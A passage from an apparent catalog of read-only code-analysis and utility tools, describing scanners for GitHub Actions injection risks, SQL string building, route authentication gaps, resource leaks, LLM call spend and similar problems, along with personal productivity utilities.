rather than dressed up. Also flags actions/checkout with an attacker-controlled `ref:` inside a base-context workflow, which puts the attacker's own commit next to your secrets; a `${{ }}` that reaches the shell through `env:` and is then re-interpolated as ${{ env.X }}, which is the same sink one hop away; a base-context workflow with no `permissions:` block at all, so the token gets the repository default; and a `write` scope granted to a job with no step that writes anything through it, judged once per place the grant is written rather than once per job it reaches. `${{ secrets.X }}` and `${{ github.sha }}` cannot become findings: sources are matched against an allowlist of fields an outsider can actually write. The safe pattern, where untrusted text sits in `env:` and the script reads "$VAR", is recognised and reported as context, never as a finding. Every run ends with what could not be verified, so a clean result is not over-trusted. Offline, read-only, no network call, no credentials read.ROTE2 STEPSREAD ONLY2 ↓406Unclosed ResourcesAnswers one question about a codebase: where does it acquire an OS or database resource and not reliably release it? A leaked file handle or connection works fine until the day it does not, and then it surfaces as "too many open files" a long way from the line that caused it. Covers Python open, socket, sqlite3.connect, requests.Session and subprocess.Popen; Go os.Open/Create/OpenFile, net.Dial and tls.Dial, sql.Rows from Query, and http.Response bodies from Get/Post and client.Do; JavaScript and TypeScript fs.openSync, fs.promises.open, createReadStream/createWriteStream, and a client checked out of a connection pool; and Java FileInputStream, FileOutputStream, FileReader, FileWriter, RandomAccessFile, Socket and JDBC Connection. Findings are ranked by consequence, because not all leaks matter equally: an acquisition inside a loop or a per-request handler is critical because it leaks per iteration or per request and will eventually exhaust the limit, an acquisition released only on the straight-line path is high because an early return or a raised exception skips it, and an acquisition in main or in top-level script code is medium because process exit reclaims it. The high tier is split by one bounded local check - whether a return, continue, break, throw, panic or raise actually appears between the acquisition and its first release downstream - so a release an early return really can skip is reported separately from one only an exception could skip, and a Go if err != nil guard sitting directly after the acquisition is discounted because on that path the handle was never created. Only releases downstream of the acquisition are credited to it, so a name reassigned three times in one function is not credited with the Close belonging to an earlier handle. Four situations are excluded by name rather than reported: a resource handed back to the caller, a resource stored on self, this or a struct field, a pool or singleton built once at startup, and anything already inside a with, a defer Close, a try-with-resources or a finally that closes it. A Go defer inside a loop is reported, because it runs at function return rather than at the end of the iteration. Comments and string bodies are blanked by a language-aware lexer, so a commented-out acquisition is prose and a doc string that mentions close is not a release; every handle must be bound to a name before it is tracked; and .Do, .Query and .connect must show idiomatic evidence before they count at all, because they are ordinary method names in a hundred libraries that hold no resource. Rust is deliberately not scanned: Drop releases a File, a TcpStream and a MutexGuard on scope exit, so the bug barely exists there. Read-only, offline, no credentials.ROTE3 STEPSREAD ONLY2 ↓407Stale PinsAnswers one question about the pins in a repository: which pinned references are stale, and how stale? People pin a dependency to a commit or a digest for safety and then never revisit it, and a pin that is years old is its own risk. Reads GitHub Actions workflows and action definitions, Dockerfiles, package.json, Cargo.toml, go.mod, requirements files and .gitmodules, and reports the pinned reference on every line it finds with that line's real line number. Covers Actions pinned to a full commit SHA with a version comment, where a comment naming an old major is a real maintenance risk, and a SHA pin with no comment at all, where nobody reading the file can tell what it is; Docker base images pinned by digest, which by construction never pick up an upstream rebuild; git dependencies pinned to a revision in package.json, Cargo.toml, go.mod and requirements files; and the commits submodules are parked at, read from the tree because .gitmodules does not carry them. Actions pinned to a mutable ref (@v3, @main, @release/v1, or no ref at all) are the opposite problem and are reported in their own section, as a supply-chain exposure rather than a staleness one. Age is determined with no network call at all, from three sources that are not equally good and are named on every single pin: a Go pseudo-version embeds the UTC timestamp of the upstream commit and is EXACT; git blame on the pin's own line gives the last time that line changed, which is a LOWER BOUND on the pin's age and is never presented as the age itself; a file modification time is a weak lower bound used only outside a git repository. A pin that cannot be dated goes into a named undatable bucket rather than being guessed at or dropped. A pin whose comment says why it is frozen is reported as a deliberate decision and never counted. Ranked by consequence: an Action three majors back, or a digest-pinned base image untouched for two years, outranks a pseudo-version that minimal version selection chose on its own. Offline, read-only, no network call, no credentials read.ROTE2 STEPSREAD ONLY2 ↓408Sql String BuildingAnswers one question about a codebase: where does it build a SQL statement from a string rather than from parameters. Parameterised queries have existed as long as SQL drivers have and almost every codebase uses them almost everywhere, so the bug is never the whole data layer, it is one forgotten place. Finds f-strings, .format(), %-interpolation and + concatenation producing SQL in Python; template literals with ${} inside a SQL string in JavaScript and TypeScript; fmt.Sprintf feeding a query in Go; + concatenation and String.format reaching createQuery, createStatement, executeQuery or prepareStatement in Java, Kotlin and Scala; and format! feeding a query in Rust. SQL is recognised by keyword shape - SELECT or INSERT or UPDATE or DELETE next to FROM, INTO, SET, WHERE, JOIN, VALUES or ORDER BY - never by what a variable is called, because the variable in the forgotten place is as likely to be called s as sql. Severity is decided by where the interpolated value comes from, which is the only part that tells an author whether to stop what they are doing: critical when the value traces to request data inside the same function, a query parameter or body field or path segment or header or an argv or stdin read; high when it is a function parameter or an identifier not resolvable in the enclosing function, so a caller may control it; medium when it traces to a local literal or a constant, which is a style problem rather than an injection. Interpolation of a table name, a column name or a sort direction is reported in its own bucket and deliberately NOT called injection, because a placeholder cannot bind an identifier and the fix is an allowlist. Four correct patterns are recognised and never reported: a query built entirely from literals, an ORM builder chaining .where over bound values, a placeholder list built by joining ? or %s or $n characters which is the right variable-length IN clause, and a parameterised query whose parameters come straight off a request. Comments and string bodies are separated by a language-aware lexer, so a commented-out injection stays a comment and a doc string that names one is prose. Test, fixture and migration files go to their own lower bucket. Read-only, offline, no credentials.ROTE3 STEPSREAD ONLY2 ↓409Sourcemap ExposureFinds production build output that hands the public your original source. Grades by reach and by content instead of counting *.map files. A map in .next/static is served to every visitor, a map in .next/server ships inside the image but no browser can fetch it, and a map under .next/dev or .next/cache was written by the dev server and never published at all. Content then decides severity, because a map carrying sourcesContent for your own code is full source disclosure, the same map carrying only node_modules source leaks bundle shape, and a map with relative sources and no content leaks a file tree and nothing more. Reads index maps through their sections, so a turbopack map with an empty top-level sources array is still graded on what its sections carry. Follows every sourceMappingURL comment and separates a reference whose target is shipped from a broken one that 404s, and decodes data URI maps that travel inside the bundle where there is no separate file to delete. Also reads the build config that decides the next build, including productionBrowserSourceMaps, webpack devtool, and the vite and tsup sourcemap options, with a real tokenizer, so a commented-out setting and a NODE_ENV ternary are not reported as enabled. Read-only, never builds anything.ROTE2 STEPSREAD ONLY2 ↓410Skipped TestsInventories the tests that are not actually running, and finds the one that silently disables everything else. A stray it.only, describe.only, fit or fdescribe de-selects every sibling around it and the suite still reports green, because a de-selected test counts as skipped rather than failed; this reports how many siblings each focus takes down, whether the runner scopes it to one file or the whole run, and whether anything in the repo (--forbid-only, an eslint no-only-tests rule) would have caught it. Also inventories .skip/xit/xdescribe, pytest skip/skipif/xfail and module-level pytestmark, unittest skip, Go t.Skip and build constraints, Rust #[ignore], JUnit @Disabled, googletest DISABLED_, test.todo, empty test bodies, and tests whose only assertion is commented out. Every finding is dated with git log on its own line, because a skip from two years ago is a different problem from one from yesterday, and is graded on whether it carries a reason. Precision is the point: comment bodies and string contents are masked before any rule runs, so skipLibCheck, a lodash chain's .skip(), skipWaiting, a variable named skipped, a commented-out it.only and a "test.skip(" inside an assertion are not findings; test.each and test.concurrent are not skips; a platform skipif with a reason is graded as a deliberate guard rather than as rot; and a focus in a file the runner excludes is reported as undetermined rather than guessed. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY2 ↓411Route Auth GapsAnswers one comparative question about a web application: which HTTP routes have no authentication or authorization check, next to sibling routes that do. The comparison is the point, because an application where no route checks a caller is most likely public on purpose, while one where fourteen routes check and the fifteenth does not has a hole. Covers Next.js App Router route handlers, Next.js pages/api, Express, Fastify, Hono and Koa-router registrations, Flask, FastAPI, Starlette and Quart decorators, and Go net/http, chi, gorilla/mux, gin and echo handler registrations, and looks for a check in four places: the handler body, the middleware arguments of the registration itself, a use/Use/With/Group middleware in an enclosing scope, and one hop into a helper the file defines. Two things are flagged separately and higher: a route that reads a user, account or tenant identifier out of the request with no check at all, because that is a direct object reference anyone can iterate, and a wildcard CORS origin combined with credentials, which no browser honours. Precision is the whole design. Comments and string bodies are blanked by a language-aware lexer, so a commented-out registration is prose and a path containing the word auth never satisfies an auth rule; a registration only counts as a route when its last argument is a function, which is what keeps axios.get(url, config) out; reading identity is separated from enforcing it, so a route that fetches the session token and then serves anonymous callers anyway is not credited with a check; a handler this analyser cannot locate is reported as unjudged rather than accused; and a health check, a metrics endpoint, a public asset, a login or callback route and a webhook that verifies its own signature are recognised, excluded, and named as exclusions in the output. Read-only, offline, no credentials.ROTE3 STEPSREAD ONLY2 ↓412Overfetch ResponseAnswers one question about a web application: which HTTP responses hand a client more of a record than the endpoint needs. The shape of the bug is an endpoint that returns the whole database row because that was one line of code, and three fields nobody meant to expose going out with it. Five things are looked for: a handler that returns a whole ORM object, model instance or SELECT * row directly as the body with no field projection, serialiser allowlist or DTO; a response that names a sensitive-looking field (password_hash, salt, api_key, token, otp, reset_token, session_id, stripe_customer_id, internal_notes, is_admin, deleted_at, raw_response) while the rest of the body is public-shaped; a SELECT * feeding a response; a spread or merge that widens a response ({...user}, dict(**row), Object.assign({}, record)), which silently inherits any column a later migration adds; and a serialiser with an explicit denylist (exclude = [...]) rather than an allowlist (fields = [...]), which fails open the moment a column appears. Findings rank by exposure: a sensitive-named field is critical, a whole-record return on a route with no visible check is critical, the same return behind an auth check is high, and a denylist serialiser is medium because it is a latent failure rather than a present leak. Telling "returned to a client" apart from "returned to the caller inside the same process" is the hard part and the whole value, so it is answered structurally: a response expression counts only when it is a modelled emitter (NextResponse.json, res.json, c.json, jsonify, JSONResponse, c.JSON, json.NewEncoder(w).Encode, writeJSON) or a Python route function s own top-level return, AND it sits inside the resolved handler span of a route registration found in that same file. Comments and string bodies are blanked by a language-aware lexer first. Five narrowings are excluded rather than reported - a literal whose keys are written out, a projection helper called by name, a FastAPI response_model, a Pydantic model dump, an ORM column projection - and so are a GraphQL endpoint, an admin route with a visible check, an internal helper returning a record to other server code, and every test tree. Covers Next.js App Router and pages/api, Express, Fastify, Hono, Koa, Flask, FastAPI, Starlette, Quart, and Go net/http, chi, gorilla/mux, gin and echo. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY2 ↓413Money PrecisionAnswers one question about a codebase: where does it handle money in a type that cannot represent it exactly. 0.1 plus 0.2 is not 0.3, so money kept in a float, a double, a SQL real or a JavaScript Number is a rounding error waiting for an audit. Finds a money-named field or variable declared float and then used in arithmetic; a schema or migration column declared float, double, real or double precision instead of numeric, decimal or an integer minor unit, read from SQL DDL, Prisma models, SQLAlchemy and Django columns, Drizzle builders, Go struct tags and JSON Schema or OpenAPI documents; float money that accumulates across records, meaning total plus equals price inside a loop, a sum over floats, or an average; a currency conversion or a percentage applied by float multiplication and rounded once at the end where rounding should be defined per operation; an equality comparison between money floats, which is the classic silent bug; and money crossing a JSON boundary as a float, where a JavaScript Number loses integer precision above 2 to the 53rd minor units. Telling money apart from a number that happens to be called cost is the whole value, so a finding is only called money when there is currency evidence next to it: a currency code or symbol nearby, a usd or cents style suffix on the name itself, a currency column in the same table or struct, a payments library imported in the file, or billing vocabulary in the enclosing declaration. Money-named hits with none of that go to their own unconfirmed bucket and are never mixed with confirmed money. Severity separates three different problems: critical when the value is stored or transmitted as a float and is authoritative, high when float arithmetic accumulates across records, medium when the value is display only or an estimate where float is defensible. Rates, ratios, scores, probabilities, latencies, byte counts, display percentages, token and compute spend estimates, and anything already using an integer minor unit or a Decimal, BigDecimal, big.Rat or numeric type are excluded, counted, and reported with the reason. Comments and string bodies are separated by a language-aware lexer, so a commented-out float total stays a comment. Test and fixture files go to their own lower bucket. Read-only, offline, never connects to a database, no credentials.ROTE2 STEPSREAD ONLY2 ↓414Llm Spend GuardWhere a context-overflow scanner asks whether a prompt will exceed the window, this asks whether anything bounds what a call sends or spends, so an unbounded read, a call inside an unbounded loop, a missing max_tokens, an uncapped retry and a missing timeout are the findings, and history growth is reported as cost and overflow separately because they have different fixes. It reports token-shaped facts and deliberately refuses to print a cost estimate, because pricing tier, model version and cache hit rate are invisible to static reading. Answers one question about a repository: which model calls have no bound on what they send or what they spend. An LLM call whose input size is not bounded by anything is a bill with no ceiling, and it fails in production on the one document that is bigger than every document it was tested with. Seven shapes are looked for, graded by unbounded-ness rather than by guessed cost. Critical: a whole file, a whole result set or a whole directory read reaching a prompt with no slice, no chunker and no token budget - `open(f).read()` straight into a prompt is the canonical form; and a model call inside a loop over a collection nothing caps, so spend scales with a data volume nobody checks. High: a prompt built from a loader helper defined in another module, which the verify stage then goes and reads; conversation history appended to and replayed in full with no window and no summarisation - reported TWICE, once as the cost that grows every turn and once as the context overflow that eventually fails the request, because the two have different fixes; and a retry around the call with no attempt ceiling, which multiplies spend on exactly the day the provider is degraded, noted as mitigated rather than clean when it at least backs off. Medium: no max_tokens on a call whose input IS bounded, where the provider default may be far above what the code intends, and no timeout, so a hung request holds a worker while the uncapped retry fires anyway. Informational: an expensive model where the surrounding code reads like classification or a yes/no judgement - said out loud to be a guess about intent, because the quality bar a call has to clear is not visible in the code. Every critical and high candidate is then re-opened by a separate verify stage that walks the repository - for the loader helper defined one hop away that already truncates, for a cap on the collection the per-function pass never reached, for a window on the history in another file - and emits CONFIRMED, WITHDRAWN or UNCERTAIN quoting the line it read. NO DOLLAR FIGURE IS EVER PRINTED. This play does not know your pricing tier, your model versions or your cache-hit rate, and a confident monthly estimate from static reading would be a fabrication; findings are token-shaped and you price them. Covers Python, JavaScript, TypeScript and Go across the OpenAI, Anthropic, Google, Bedrock, Vercel AI SDK, LiteLLM and Ollama shapes, plus raw HTTP posts to a model endpoint. Read-only, offline, no network call, no credential ever copied.ROTE4 STEPSREAD ONLY2 ↓415Error SwallowingAnswers one question about a codebase: where does it catch an error and then do nothing useful with it? The bug you cannot debug is the one whose error was thrown away, so this finds the throwing-away. Covers Python `except: pass`, `except Exception: pass` and a broad except whose only action is a debug-level log; JavaScript and TypeScript `catch {}`, `catch (e) {}` with an empty body, `.catch(() => {})`, and a floating promise chain with no rejection handler at all; Go `_ = err`, `if err != nil {}` with an empty branch, and a returned error dropped into the blank identifier at the call site; Java and Kotlin `catch (Exception e) {}`; Rust `let _ = result` on a Result and `.ok()` used purely to discard the error; and Ruby `rescue nil` and an empty rescue clause. The severity ranking is the value: worst is a swallowed error around an operation whose failure changes correctness - a write, a transaction commit, an auth or permission check, a payment, a signature verification - because the program then continues in a state it believes is good and is not; the middle is a handler that loses the cause while a fallback keeps behaviour defined, so nobody will ever learn why the fallback fired; the lowest is a genuinely optional operation. Legitimate cases are recognised, put in their own labelled bucket, counted and deliberately NOT reported: a best-effort cache warm, a telemetry ping, a close or unlink in a finally, ensure or defer. A comment on or above a handler that explains why the failure is ignorable is strong evidence of intent, so those are reported in a separate section, "ignored deliberately, with a stated reason", so a reader can see they were considered. A stated reason relocates a finding but never shrinks it: one that guards a write, a commit, an auth check or a signature verification keeps its critical severity, is counted separately in the verdict, and is listed first in that section, because whether the author's reasoning is sound is a judgement this play cannot make. Three comment shapes count as a stated reason: an unambiguous phrase like best-effort or non-fatal, a weaker intent word paired with a failure word, and - the shape people actually write - a declarative sentence that both names the failure and states the accepted consequence, as in a source that fails to re-fetch keeps its old facts. Both halves are required, so a bare failure, a bare consequence and a TODO are all still reported. A reason is read on the handler line and the line above it, and - for a handler with a block body, where a comment inside the block unambiguously belongs to that handler - the line below it too; a one-line discard gets no credit for the line beneath it, because that sentence belongs to the next statement. Comments and string bodies are blanked by a language-aware lexer, so a commented-out handler is prose and a docstring discussing `except: pass` is never a finding; Rust lifetimes are told apart from char literals and JavaScript regex literals from division. Read-only, offline, no credentials.ROTE3 STEPSREAD ONLY2 ↓416Dep SkewFinds the same dependency declared at different versions inside one dependency set, which is what silently doubles a bundle, produces "two copies of React" bugs, and makes upgrades unpredictable. Reads declared ranges from package.json, pyproject.toml, requirements*.txt and Cargo.toml; installed trees are pruned, because node_modules records what a resolver already picked rather than what anyone asked for. Scope is the whole point: ranges are compared only inside one npm/pnpm/yarn or Cargo workspace, or one project's own manifests, so two unrelated repos that both use lodash are never called skew. Findings are ranked by real distance, so a 1.x-vs-3.x split outranks a caret-vs-tilde difference, 0.x minors count as major because semver says they break, and a range already forced by resolutions/overrides or inherited through workspace = true is reported as pinned instead of as a finding. Offline, read-only, no credentials.ROTE2 STEPSREAD ONLY2 ↓417A11y GuardAudits JSX, TSX, HTML, Vue and Svelte files for accessibility barriers that actually block people: images with no alt text, click handlers on elements no keyboard can reach, form fields with no accessible name, interactive elements hidden from screen readers, and media with no captions. Every finding cites its WCAG success criterion and the fix. Tags are parsed with a brace-aware scanner, so JSX arrow functions in attributes do not corrupt results, and comments never produce findings. Read-only, no build step, no browser, no credentials.ROTE2 STEPSREAD ONLY2 ↓418Autonomous Pr Triage SentinelDeterministic PR triage engine that audits branches for merge residue, exposed credentials, and generates an executive markdown gate review.ROTE1 STEPSREAD ONLY2 ↓419Data Pipeline SentinelAutonomous schema integrity and data corruption sentinel for pipelines and model training sets.ROTE1 STEPSREAD ONLY2 ↓420Upgrade Impact TriageOf your outdated dependencies, which ones ship breaking changes in code you actually import? Reads every manifest under root, resolves current versus latest from npm, PyPI or crates.io, reads the GitHub release notes between the two, and finds the files and line numbers that import each package. Ranks each dependency ACT (breaking changes, and you call it directly), REVIEW (you call it, but the notes could not be read), SAFE (transitive, or the notes were read and were clean) or CURRENT. An unreadable changelog reports as REVIEW and never as SAFE, so a rate-limited or offline run produces more rows to check by hand and never fewer warnings. Standard library Python only; GITHUB_TOKEN is optional and raises the API rate limit.ROTE5 STEPSREAD ONLY2 ↓421Show Hn TimingAnswers "when should I post my Show HN" from the posts themselves instead of folklore. Reads the live Show HN listing through the Hacker News adapter, fans out to fetch each submission individually, and reduces them locally into score and comment distributions by hour of day and day of week in a timezone you choose, plus the title characteristics that co-occur with a higher median. It reports the median and the p90, never the mean, because a handful of front-page outliers drag a mean far above anything a typical post gets, and it leads with the base rate - the share of sampled posts that scored under a threshold - because that is the honest denominator most launch advice hides. Every number carries the sample size it came from, and an hour with too few posts is printed as too few posts rather than as a median over three. It reports correlation and refuses to phrase it as a recipe: these are the posts the listing shows right now, ranked by the site's own algorithm, not a random sample of everything ever submitted. If the fetch comes back incomplete - the API unreachable, rate-limited, or returning a partial set - the whole report is withheld and the play prints UNKNOWN, because the items that failed are not a random subset of the items that succeeded and a confident chart over the survivors is worse than no chart. Needs no account, no credential and no key. Read-only: it reads public listings and posts, and writes nothing.APIHACKER-NEWS-API4 STEPSREAD ONLY2 ↓422Mcp Package HealthAre the npm and PyPI packages behind your MCP servers still maintained? Reads the same harness-owned configs as our mcp-context-tax and mcp-doctor (Claude Code, Claude Desktop, Cursor, Codex, Windsurf), resolves each stdio server's command to a package identity (npx, npm exec, uvx, uv tool run, pipx run, including --from and --spec; a trailing @version is read as a pin, never merged into the name; a python -m module is reported unresolvable rather than guessed at), then asks registry.npmjs.org and pypi.org about it. Deprecated and yanked rank first, being the registries' own words; then pin drift; then days since the last release as a FACT, never a verdict -- a finished package can go years without one, and this play never says abandoned or unmaintained. A 404 reads as not found in the public registry, never as does not exist. The ONLY thing that leaves your machine is a package NAME, allowlist-checked before the request, which does reveal which MCP servers you run. Never spawns a server, never installs or upgrades anything. Read-only, no credentials; needs python3 and curl.ROTE2 STEPSREAD ONLY2 ↓423Agent Plugin InventoryYour harness extensions accumulate like browser toolbars -- this inventories them. Four jobs, two steps: (1) Claude Code plugins -- every entry in installed_plugins.json (name, version, scope, marketplace, install/update timestamps), cross-referenced against settings.json's enabledPlugins map (a plugin absent from that map is treated as enabled by Claude Code's own default, disclosed rather than guessed disabled) and measured on disk -- present/missing/empty/inaccessible, plus an apparent-size byte count (POSIX st_size, no `du` dependency, matching agent-disk-tax's own approach); (2) personal skills under ~/.claude/skills/* (name, frontmatter description FIRST LINE truncated to 80 characters, file mtime) -- no other file content is ever read, from a personal skill or from a skill bundled inside an installed plugin; (3) known marketplaces from known_marketplaces.json (name, last-sync time when known_marketplaces.json actually records one -- never guessed when it does not); (4) Codex plugin-equivalents where present, read from ~/.codex/config.toml's [plugins."name@marketplace"] and [marketplaces.<name>] tables (enabled bool, recorded last-sync when present) -- probed defensively and this whole source degrades alone, never the rest of the report, when ~/.codex or its config.toml is absent or unparseable; on a pre-3.11 Python this narrows to a fallback reader recognizing only the shapes Codex's own config actually uses, disclosed in the report, never a lost source. FOUR FLAGS, each conservative and "-suspect", never a certainty: name-collision-suspect (a skill name found under more than one owner, compared case-insensitively -- two plugins bundling the same skill name, or a plugin skill sharing a name with a personal one; which one actually wins at runtime is harness-defined and never evaluated here, since nothing here spawns or loads anything to find out); broken-install-suspect (an installed plugin, Claude Code or Codex, whose own cache directory is missing or empty -- an inaccessible cache directory, a permission problem rather than evidence of a broken install, and a plugin with no installPath recorded at all or one outside Claude's own plugin cache root, neither evidence of a broken install, are both counted separately and never folded into this flag); stale-suspect (a Claude Code marketplace not refreshed in stale_days or more -- Codex's own marketplace sync recency is a separate, disclosed, unevaluated boundary); disabled-but-cached (a plugin explicitly disabled in its own harness config whose cache directory is still present on disk -- a disk note, not a security finding, that ties by name to agent-disk-tax, our separately published play that measures what that disk cost actually is). Every skill description is truncated to 80 characters before this play ever holds onto it, and no path this play would otherwise print survives into a diagnostic -- an OS error is reduced to a short, non-secret reason instead. Read-only throughout: this play edits, deletes, installs, enables, disables, and moves nothing, kills no process, and makes no network call of its own; needs only python3.ROTE2 STEPSREAD ONLY2 ↓424Release Checksum IntegrityDeterministically compares GitHub release assets with checksum manifests and verifies accessible asset bytes.ROTE1 STEPSREAD ONLY2 ↓425Claude Code Shell DoctorWrites exactly one file: ~/.rote/claude-code-shell-doctor/history.jsonl (append-only); makes no other writes, never edits shell config, never calls sudo, never prints token values. Diagnoses why Claude Code breaks from shell-environment issues: node/npx shim shadowing, unreachable provider API base-URL gateways (Anthropic, OpenAI, OpenRouter, Ollama) probed by real TCP connection, and .bashrc interactive-guard env leakage across interactive vs non-interactive shells; opens each report with what changed since the last run. Covers WSL/Windows (interop shadowing, /mnt/c PATH pollution) as well as Linux and macOS.ROTE3 STEPSREAD ONLY2 ↓426Qa AgentQA-Agent (v0.0.2): Automated Web Quality Analyst & Remediation Engine. Connects to real local/remote code repositories on disk to inspect TypeScript/JavaScript source files for real bug patterns (unhandled promise rejections, unsafe JSON.parse, swallowed errors, broken imports), maps findings to file paths and line numbers, and opens draft GitHub PRs on demand.ROTE1 STEPSREAD ONLY2 ↓427Context PackerScans a codebase, estimates LLM token costs (Claude/GPT-4o/Gemini), identifies bloat, and generates an XML context payload + optimization report.ROTE1 STEPSREAD ONLY2 ↓428NamasteNamaste (v0.0.2): Global Tech News Briefing & Radar. Features clean zero-markdown terminal tree rendering, ANSI box banners, domain filters (all|ai|devops|security|web|startups), archetype filters (briefing|breakthroughs|incidents|launches|deep-dives), interactive link shortcuts (read=1), and compact MOTD mode.ROTE1 STEPSREAD ONLY2 ↓429Wsl Disk ReclaimAnswers one question on a WSL machine: why is the Windows drive full when the distro says it is not. A WSL2 distro lives in a virtual disk that grows on demand and never shrinks on its own. Delete forty gigabytes inside the distro and the file Windows sees stays exactly as large as it ever got, because handing the space back requires an explicit compaction that nothing prompts you to run. df, run inside, reports only the inside view, so the missing space is invisible from the one place people look for it. This reports both numbers and the gap between them, per image rather than in aggregate, and that distinction is the point: the distro image can be compared against what the filesystem says it is using, while Docker Desktop keeps a separate disk whose interior is not visible from inside the distro, so folding it into one total would invent tens of gigabytes of reclaimable space that are not free. It then measures the caches inside that are worth clearing, marks the ones that nest so a parent and its child are never counted twice, and lists a measurement that did not finish as not measured rather than as zero. The output ends in commands, in the order that actually works: freeing space inside does nothing to the Windows file until the image is compacted, and compacting before freeing reclaims almost nothing, which is why people try one, see no change, and conclude the whole exercise is a myth. Read-only by construction: it stats files and runs du, deletes nothing, compacts nothing, carries no credentials, and needs only python3 and coreutils. Every suggested command is printed for a person to run, never executed. On a host that is not WSL it returns a single applicability verdict instead of inventing findings.ROTE4 STEPSREAD ONLY2 ↓430DetectiveLog Investigation CLI. Pipe logs from any command (kubectl logs, aws logs, docker, journalctl, cat app.log) or pass a file path to immediately investigate what happened, why it happened, the evidence, and recommended next actions. Zero configuration, zero external dependencies; needs only python3 and sh.ROTE1 STEPSREAD ONLY2 ↓431Analytics CheckTells you whether PostHog, Umami, Vercel Analytics, Microsoft Clarity, Plausible or Google Analytics 4 are actually collecting data, not just installed, and can set them up for you. Supports Next.js (app and pages router), Vite plus React, Astro and SvelteKit, each using that framework's real idiom rather than one generic snippet: a React-context Provider wrapping the page in Next.js, wrapping the root render() call in Vite, plain script-tag initialisation in Astro and SvelteKit since those have no component tree to wrap. A provider only works when three things agree: the package or script tag is present, the code mounts it, and the key it reads is actually set. The common failure is invisible: fully installed and mounted, silently recording nothing because the environment variable was never set. The key name is read out of your own code rather than guessed, so a custom variable name is still recognised correctly. Pass add=<provider> (comma-separated for more than one) to set one up: with apply=true it creates the file, appends the missing environment keys to .env.local blank so you only have to paste in the real value, and mounts it, wiring existing setups when it can do so unambiguously. A mount point that is genuinely ambiguous, or a framework this play has no dedicated integration for, is left completely untouched and named in the report rather than guessed at, because a wrong edit to hand-written source is worse than no edit. Every file write is additive and every write that fails (a read-only file, a permissions error) is reported cleanly rather than crashing the run. The default apply=false only prints what would be done. In a monorepo it points you at the app folder instead of scanning the root.ROTE6 STEPSREAD ONLY2 ↓432Job Application TrackerScans Gmail inbox for job application emails, classifies them into categories (interview, offer, assessment, rejected, applied, needs_action), logs results locally, and sends Telegram alerts for action items.ROTE0 STEPSREAD ONLY2 ↓433Deadline ReconcileCross-source deadline reconciliation across local task, github, and calendar JSON sources, detecting conflicts, drift, overdue/upcoming items, missing work blocks, and source disagreement.ROTE1 STEPSREAD ONLY2 ↓434Find Cheapest Instance For WorkloadGive it a CPU and memory shape and it names the cheapest EC2 instance type that actually fits, with the full pricing ladder underneath: on-demand, spot with its published interruption band, and one and three year reserved. Kubernetes quantities are parsed properly, so 1500m is 1.5 vCPU and 4Gi is 4 GiB while 4G is 3.73 GiB, which is the arithmetic that produces confidently wrong dollars when a tool gets it casually wrong. Point it at a manifest or a rendered chart and it sums the resources.requests it finds instead. Every candidate reports stranded capacity, the vCPU and memory you pay for and cannot use, so a memory-shaped workload is never handed a compute-family box just because the hourly rate looked lower. A burstable type is flagged rather than silently recommended, because its vCPU is credit-metered and throttles under sustained load, and the cheapest sustained-throughput alternative is priced beside it. It also reports pool depth: how many instance types in that region satisfy the requirement at all. That number matters more than the price, because a node pool whose requirements admit three types is exhausted long before the region is. Excluded from every figure and said so plainly: EBS volumes, data transfer, control plane, load balancers and NAT. Public rate cards only, read-only, no cloud account, no credentials, no kubeconfig, nothing written.ROTE3 STEPSREAD ONLY2 ↓435Find Reclaimable Disk SpaceHow many gigabytes of regenerable build output is this machine carrying, and which projects stopped needing it. Walks your home directory for the artifact directories that a build can recreate from source: node_modules, .venv, target, .next, dist, build, __pycache__, .gradle, .terraform, Pods, DerivedData. Each one is sized and then dated by the last commit in the git repository that owns it, so the answer separates the 900 MB belonging to a project you shipped last week from the 900 MB belonging to one you abandoned in January. A nested node_modules is counted once with its parent rather than four hundred times, which is the difference between a right number and a noisy one. Shared caches such as ~/.cargo, ~/go/pkg, ~/.npm and ~/Library are deliberately excluded and named in the output, because deleting those slows every project instead of one. A directory whose repository cannot be dated is reported UNKNOWN, never guessed and never called safe. The cleanup commands are printed as text: this play executes nothing, deletes nothing and writes nothing. Reads the filesystem and git only, makes no network call, carries no credential, and takes no required arguments.ROTE3 STEPSREAD ONLY2 ↓436Fda Drug Recall Label BriefGiven a drug name (brand or generic) and an optional since-date, looks up FDA recall/enforcement reports and label record updates via the public openFDA API and produces a cited brief with source links. Read-only, no credentials; reports record metadata only, never a clinical or safety-signal claim.ROTE2 STEPSREAD ONLY2 ↓437Pr Purgatory SweeperCross-system daily scanner: finds stuck PRs, uses AI to summarize the blast radius, and posts a targeted Slack/Telegram digest.ROTE0 STEPSREAD ONLY2 ↓438What Did I Leave UnfinishedThe unfinished work sitting in your notes, sorted by how long it has been sitting. Reads your markdown and text files, pulls out unchecked checkboxes and the TODO and FIXME markers you left yourself, and leads with the files you stopped editing weeks ago rather than the one you touched this morning. A note you edited today is open, not forgotten; the whole point is the other kind. It counts what it ticked off too, so a file with nine of ten boxes done reads differently from one with none. Skips fenced code blocks, because a TODO in a snippet is usually an example rather than your task. Reconciles its own counts before it reports and says so if they disagree, and a walk that hit its own bounds is never allowed to report all clear. Reads your files and writes nothing, makes no network call, needs no credential, and runs on python3 alone.ROTE5 STEPSREAD ONLY2 ↓439Tempo SessionSchedules unpredictable, bounded breaks and reward moments (stretches, meditation, music, social/web) during 1–2 hour focus sessions.ROTE1 STEPSREAD ONLY2 ↓440ApplyradarA read-only job search engine that verifies original listings, posting freshness, explicitly disclosed compensation thresholds, experience eligibility, and active application routes before returning actionable software engineering opportunities; never logs in or applies.ROTE1 STEPSREAD ONLY2 ↓441Assess Github Ml Benchmark ClaimsAssess benchmark claims in a public ML repository against README and implementation evidence.APISESSIONSGITHUB2 STEPSREAD ONLY2 ↓442Build TrackerInstruments analytics either from a PRD (deriving events from its described user flow) or directly from a codebase with no PRD (scanning for untracked user actions and bootstrapping a baseline convention). Flags ambiguities and judgment calls instead of guessing.ROTE1 STEPSREAD ONLY2 ↓443Calorie Meal AdvisorAutonomous macronutrient telemetry daemon, caloric threshold watcher, and adaptive dietary recommendations dispatcher.ROTE1 STEPSREAD ONLY2 ↓444Smart Fitness CoachAdaptive workout routine generator, recovery tracker, and metabolic training coach.ROTE1 STEPSREAD ONLY2 ↓445Playoffs PulseROTE1 STEPSREAD ONLY2 ↓446Start My DayCross-source morning brief joining GitHub PRs and Google Calendar meetings into a prioritized list.APISESSIONSCALENDARGITHUB7 STEPSREAD ONLY2 ↓447Sql Query ReviewerValidate and review SQL queries for 